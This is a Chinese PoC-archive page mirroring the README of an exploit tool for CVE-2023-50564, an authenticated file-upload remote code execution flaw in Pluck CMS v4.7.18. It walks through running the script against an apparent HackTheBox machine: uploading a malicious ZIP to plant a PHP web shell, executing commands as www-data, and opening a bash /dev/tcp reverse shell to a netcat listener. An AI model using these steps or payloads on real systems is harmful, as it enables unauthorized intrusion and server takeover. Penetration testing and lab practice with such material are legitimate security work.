关联漏洞
标题:
Pluck 安全漏洞
(CVE-2023-50564)
描述:Pluck是一套使用PHP语言开发的内容管理系统(CMS)。 Pluck v4.7.18版本存在安全漏洞,该漏洞源于组件 /inc/modules_install.php 中存在任意文件上传漏洞,允许攻击者通过上传精心设计的 ZIP 文件来执行任意代码。
描述
Pluck-CMS v4.7.18 RCE exploit
介绍
# CVE-2023-50564
CVE-2023-50564 is an RCE vulnerability in Pluck CMS v4.7.18. It is made possible through an arbitrary file upload vulnerability in the `/inc/modules_install.php` component allowing to execute arbitrary code by uploading a malicious `.zip` file.
# Usage
Before running the exploit, the password to authenticate on `/login.php` needs to be known.
Running the exploit against the target:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
```
The malicious `.php` file can be accessed via the link provided by the script to execute commands.
Optionally commands to be executed can be specified using the `--cmd` flag.
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd id
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
## Reverse Shell
Start the listener, then specify a command to establish a reverse shell connection on the listener using the `--cmd` flag:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1''
```
And get connection on listener:
```console
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.78.209] 38982
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/malicious$
```
# Installation
Install the requirements:
```
pip install -r requirements.txt
```
Help:
```console
$ python3 exploit.py --help
usage: exploit.py [-h] --target TARGET --password PASSWORD [--cmd CMD]
Exploit Pluck v4.7.18 RCE Vulnerability
options:
-h, --help show this help message and exit
--target TARGET Target URL (Example: http://greenhorn.htb)
--password PASSWORD Pluck password
--cmd CMD Command to execute
```
# Credits
Credits to `Mirabbas Ağalarov` for discovering the vulnerability ([Link](https://www.exploit-db.com/exploits/51592)).
文件快照
[4.0K] /data/pocs/7b2a7b716a53d6cce8fdf4dc279790bf81737f64
├── [2.3K] exploit.py
├── [4.8K] README.md
└── [ 34] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。